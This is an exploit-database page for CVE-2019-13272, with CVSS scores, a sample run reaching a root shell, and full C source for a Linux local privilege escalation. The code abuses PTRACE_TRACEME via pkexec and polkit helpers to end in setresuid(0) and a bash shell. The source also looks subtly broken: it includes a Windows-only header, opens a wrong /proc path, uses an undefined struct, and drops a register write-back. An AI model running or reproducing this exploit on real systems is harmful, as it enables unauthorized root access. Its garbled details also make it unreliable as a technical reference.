Linux Kernel 5.1.x - (PTRACE_TRACEME) pkexec Local Privilege Escalation Exploit (2)

2021-11-2300:00:00
Ujas Dhami
0day.today
462
7.8 High
CVSS3
Attack Vector
LOCAL
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
7.2 High
CVSS2
Access Vector
LOCAL
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:L/AC:L/Au:N/C:C/I:C/A:C
0.001 Low
EPSS
Percentile
18.9%
JSON
# Exploit Title: Linux Kernel 5.1.x - 'PTRACE_TRACEME' pkexec Local Privilege Escalation (2)
# Exploit Author: Ujas Dhami
# Version: 4.19 - 5.2.1
# Platform: Linux
# Tested on:
# ~ Ubuntu 19.04 kernel 5.0.0-15-generic
# ~ Parrot OS 4.5.1 kernel 4.19.0-parrot1-13t-amd64
# ~ Kali Linux kernel 4.19.0-kali5-amd64
# CVE: CVE-2019-13272

// ....
// Original discovery and exploit author: Jann Horn
// https://bugs.chromium.org/p/project-zero/issues/detail?id=1903
// Modified exploit code of: BColes
// https://github.com/bcoles/kernel-exploits/tree/master/CVE-2019-13272
// ....
// ~ Uses the PolKit_Exec frontend.
// ~ PolKit_Action is branched.
// ~ Search is optimized.
// ~ Trunks attain search priority upon execution.
// ....
// ujas@kali:~$ gcc exploit_traceme.c -o exploit_traceme
// ujas@kali:~$ ./exploit_traceme
// Welcome to your Arsenal!
// accessing variables...
// execution has reached EOP.
// familiar trunks are been searched ...
// trunk helper found: /usr/sbin/mate-power-backlight-helper
// helper initiated: /usr/sbin/mate-power-backlight-helper
// SUID process is being initiated (/usr/bin/pkexec) ...
// midpid is being traced...
// midpid attached.
// root@kali:/home/ujas#
// ....

#include <ctype.h>
#include <assert.h>
#include <conio.h>
#include <stdio.h>
#include <sys/syscall.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sched.h>
#include <stddef.h>
#include <sys/user.h>
#include <linux/elf.h>
#include <stdarg.h>
#include <pwd.h>
#include <sys/prctl.h>
#include <sys/wait.h>
#include <sys/ptrace.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>
#define _GNU_SOURCE

#define DEBUG
#ifdef DEBUG
#define dprintf printf
#endif
#define max(a,b) ((a)>(b) ? (a) : (b))
#define eff(expr) ({             \
  typeof(expr) __res = (expr);       \
  if (__res == -1) {             \
    dprintf("[-] Error: %s\n", #expr);     \
    return 0;            \
  }               \
  __res;               \
})

struct stat st;

const char *trunk[1024];

const char *trunks_rec[] = {
  "/usr/lib/x86_64-linux-gnu/xfce4/session/xfsm-shutdown-helper",
  "/usr/sbin/mate-power-backlight-helper",
  "/usr/lib/gnome-settings-daemon/gsd-backlight-helper",
  "/usr/lib/gnome-settings-daemon/gsd-wacom-led-helper",
  "/usr/lib/unity-settings-daemon/usd-backlight-helper",
  "/usr/bin/xfpm-power-backlight-helper",
  "/usr/bin/lxqt-backlight_backend",
  "/usr/lib/gsd-backlight-helper",
  "/usr/lib/gsd-wacom-led-helper",
  "/usr/lib/gsd-wacom-oled-helper",
  "/usr/libexec/gsd-wacom-led-helper",
  "/usr/libexec/gsd-wacom-oled-helper",
  "/usr/libexec/gsd-backlight-helper",
  
};
static int trace_align[2];
static const char *path_exec = "/usr/bin/pkexec";
static const char *path_action = "/usr/bin/pkaction";
static int fd = -1;
static int pipe_stat;
static const char *term_sh = "/bin/bash";
static int mid_succ = 1;
static const char *path_doublealign;

static char *tdisp(char *fmt, ...) {
  static char overlayfs[10000];
  va_list ap;
  va_start(ap, fmt);
  vsprintf(overlayfs, fmt, ap);
  va_end(ap);
  return overlayfs;
}

static int middle_main(void *overlayfs) {
  prctl(PR_SET_PDEATHSIG, SIGKILL);
  pid_t middle = getpid();
  fd = eff(open("/proc/_fd/exe", O_RDONLY));
  pid_t child = eff(fork());
  
  if (child == 0) {
    prctl(PR_SET_PDEATHSIG, SIGKILL);

    eff(dup2(fd, 42));
    int proc_fd = eff(open(tdisp("/proc/%d/status", middle), O_RDONLY));
    char *threadv = tdisp("\nUid:\t%d\t0\t", getuid());
    eff(ptrace(PTRACE_TRACEME, 0, NULL, NULL));
    execl(path_exec, basename(path_exec), NULL);
    while (1) {
      char overlayfs[1000];
      ssize_t buflen = eff(pread(proc_fd, overlayfs, sizeof(overlayfs)-1, 0));
      overlayfs[buflen] = '\0';
      if (strstr(overlayfs, threadv)) break;
    }

    dprintf("SUID execution failed.");
    exit(EXIT_FAILURE);
  }

  eff(dup2(fd, 0));
  eff(dup2(trace_align[1], 1));

  struct passwd *pw = getpwuid(getuid());
  if (pw == NULL) {
    dprintf("err: username invalid/failed to fetch username");
    exit(EXIT_FAILURE);
  }

  mid_succ = 1;
  execl(path_exec, basename(path_exec), "--user", pw->pw_name,
        path_doublealign,
        "--help", NULL);
  mid_succ = 0;
  dprintf("err: pkexec execution failed.");
  exit(EXIT_FAILURE);
}

static int timeexecbuffer(pid_t pid, int exec_fd, char *arg0) {
  struct user_regs_struct regs;
  struct exeio exev = { .iov_base = &regs, .iov_len = sizeof(regs) };
  eff(ptrace(PTRACE_SYSCALL, pid, 0, NULL));
  eff(waitpid(pid, &pipe_stat, 0));
  eff(ptrace(PTRACE_GETREGSET, pid, NT_PRSTATUS, &exev));

  unsigned long inject_surface = (regs.rsp - 0x1000) & ~0xfffUL;
  struct injected_page {
    unsigned long inj_arse[2];
    unsigned long environment[1];
    char arg0[8];
    char path[1];
  } ipage = {
    .inj_arse = { inject_surface + offsetof(struct injected_page, arg0) }
  };
  strcpy(ipage.arg0, arg0);
  for (int i = 0; i < sizeof(ipage)/sizeof(long); i++) {
    unsigned long pro_d = ((unsigned long *)&ipage)[i];
    eff(ptrace(PTRACE_POKETEXT, pid, inject_surface + i * sizeof(long),
                (void*)pro_d));
  }

  eff(ptrace(PTRACE_SETREGSET, pid, NT_PRSTATUS, &exev));
  eff(ptrace(PTRACE_DETACH, pid, 0, NULL));
  eff(waitpid(pid, &pipe_stat, 0));
  
  regs.orig_rax = __NR_execveat;
  regs.rdi = exec_fd;
  regs.rsi = inject_surface + offsetof(struct injected_page, path);
  regs.rdx = inject_surface + offsetof(struct injected_page, inj_arse);
  regs.r10 = inject_surface + offsetof(struct injected_page, environment);
  regs.r8 = AT_EMPTY_PATH;
}

static int stag_2(void) {
  pid_t child = eff(waitpid(-1, &pipe_stat, 0));
  timeexecbuffer(child, 42, "stage3");
  return 0;
}

static int sh_spawn(void) {
  eff(setresgid(0, 0, 0));
  eff(setresuid(0, 0, 0));
  execlp(term_sh, basename(term_sh), NULL);
  dprintf("err: Shell spawn unsuccessful.", term_sh);
  exit(EXIT_FAILURE);
}

static int check_env(void) {
  const char* xdg_session = getenv("XDG_SESSION_ID");

  dprintf("accessing variables...\n");

  if (stat(path_action, &st) != 0) {
    dprintf("err: pkaction not found at %s.", path_action);
    exit(EXIT_FAILURE);
  }
  if (system("/bin/loginctl --no-ask-password show-session $XDG_SESSION_ID | /bin/grep Remote=no >>/dev/null 2>>/dev/null") != 0) {
    dprintf("warn: PolKit agent not found.\n");
    return 1;
  }
  if (stat("/usr/sbin/getsebool", &st) == 0) {
    if (system("/usr/sbin/getsebool deny_ptrace 2>1 | /bin/grep -q on") == 0) {
      dprintf("warn: [deny_ptrace] is enabled.\n");
      return 1;
    }
  }
  if (xdg_session == NULL) {
    dprintf("warn: $XDG_SESSION_ID is not set.\n");
    return 1;
  }
  if (stat(path_exec, &st) != 0) {
    dprintf("err: pkexec not found at %s.", path_exec);
    exit(EXIT_FAILURE);
  }
  
  dprintf("execution has reached EOP.\n");

  return 0;
}

int trunkh() {
  char cmd[1024];
  snprintf(cmd, sizeof(cmd), "%s --verbose", path_action);
  FILE *fp;
  fp = popen(cmd, "r");
  if (fp == NULL) {
    dprintf("err: Failed to run %s.\n", cmd);
    exit(EXIT_FAILURE);
  }

  char line[1024];
  char buffer[2048];
  int helper_index = 0;
  int useful_action = 0;
  static const char *threadv = "org.freedesktop.policykit.exec.path -> ";
  int needle_length = strlen(threadv);

  while (fgets(line, sizeof(line)-1, fp) != NULL) {
    if (strstr(line, "implicit active:")) {
      if (strstr(line, "yes")) {
        useful_action = 1;
      }
      continue;
    }

    if (useful_action == 0)
      continue;
    useful_action = 0;

    int length = strlen(line);
    char* found = memmem(&line[0], length, threadv, needle_length);
    if (found == NULL)
      continue;

    memset(buffer, 0, sizeof(buffer));
    for (int i = 0; found[needle_length + i] != '\n'; i++) {
      if (i >= sizeof(buffer)-1)
        continue;
      buffer[i] = found[needle_length + i];
    }

    if (stat(&buffer[0], &st) != 0)
      continue;
    
    if (strstr(&buffer[0], "/xf86-video-intel-backlight-helper") != 0 ||
      strstr(&buffer[0], "/cpugovctl") != 0 ||
      strstr(&buffer[0], "/package-system-locked") != 0 ||
      strstr(&buffer[0], "/cddistupgrader") != 0) {
      dprintf("blacklisted thread helper ignored: %s\n", &buffer[0]);
      continue;
    }

    trunk[helper_index] = strndup(&buffer[0], strlen(buffer));
    helper_index++;

    if (helper_index >= sizeof(trunk)/sizeof(trunk[0]))
      break;
  }

  pclose(fp);
  return 0;
}

int root_ptraceme() {
  dprintf("helper initiated: %s\n", path_doublealign);

  eff(pipe2(trace_align, O_CLOEXEC|O_DIRECT));
  eff(fcntl(trace_align[0], F_SETPIPE_SZ, 0x1000));
  char overlayfs = 0;
  eff(write(trace_align[1], &overlayfs, 1));

  dprintf("SUID process is being initiated(%s) ...\n", path_exec);
  static char stackv[1024*1024];
  pid_t midpid = eff(clone(middle_main, stackv+sizeof(stackv),
                            CLONE_VM|CLONE_VFORK|SIGCHLD, NULL));
  if (!mid_succ) return 1;
  while (1) {
    int fd = open(tdisp("/proc/%d/comm", midpid), O_RDONLY);
    char overlayfs[16];
    int buflen = eff(read(fd, overlayfs, sizeof(overlayfs)-1));
    overlayfs[buflen] = '\0';
    *strchrnul(overlayfs, '\n') = '\0';
    if (strncmp(overlayfs, basename(path_doublealign), 15) == 0)
      break;
    usleep(100000);
  }

  dprintf("midpid is being traced...\n");
  eff(ptrace(PTRACE_ATTACH, midpid, 0, NULL));
  eff(waitpid(midpid, &pipe_stat, 0));
  dprintf("midpid attached.\n");

  timeexecbuffer(midpid, 0, "stage2");
  exit(EXIT_SUCCESS);
}

int main(int argc, char **inj_arse) {
  if (strcmp(inj_arse[0], "stage2") == 0)
    return stag_2();
  if (strcmp(inj_arse[0], "stage3") == 0)
    return sh_spawn();

  dprintf("Welcome to your Arsenal!\n");

  check_env();

  if (argc > 1 && strcmp(inj_arse[1], "check") == 0) {
    exit(0);
  }
  
  dprintf("efficient trunk is being searched...\n");
  trunkh();
  for (int i=0; i<sizeof(trunk)/sizeof(trunk[0]); i++) {
    if (trunk[i] == NULL)
      break;

    if (stat(trunk[i], &st) == 0) {
      path_doublealign = trunk[i];
      root_ptraceme();
    }
  }

  dprintf("familiar trunks are been searched ...\n");
  for (int i=0; i<sizeof(trunks_rec)/sizeof(trunks_rec[0]); i++) {
    if (stat(trunks_rec[i], &st) == 0) {
      path_doublealign = trunks_rec[i];
      dprintf("trunk helper found: %s\n", path_doublealign);
      root_ptraceme();
    }
  }

  return 0;
}